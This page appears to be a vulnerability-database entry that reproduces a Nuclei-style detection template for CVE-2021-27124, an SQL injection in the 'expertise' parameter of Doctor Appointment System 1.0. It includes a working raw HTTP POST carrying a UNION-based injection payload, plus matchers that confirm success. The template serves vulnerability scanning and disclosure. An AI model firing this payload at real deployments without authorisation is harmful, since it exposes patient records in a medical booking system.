CVE-2021-27124: Doctor Appointment System 1.0 - SQL Injection

2025-08-01 Doctor Appointment System PoC Public

Description

SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.

PoC

id: CVE-2021-27124

info:
  name: Doctor Appointment System 1.0 - SQL Injection
  author: theamanrawat
  severity: medium
  description: |
    SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
    - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-27124
    cwe-id: CWE-89
    epss-score: 0.05831
    epss-percentile: 0.92779
    cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: doctor_appointment_system_project
    product: doctor_appointment_system
  tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project,vuln

http:
  - raw:
      - |
        POST /patient/search_result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25b"
          - "Doctor Appoinment System"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022062a504c1a969ed47c564db95fcd3fcf31ec167fe999457f72741c010e3d52974022100df8b9de4de2d64ceada4b578914484ffcd553eb898edd4b2d382af0c60618f15:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities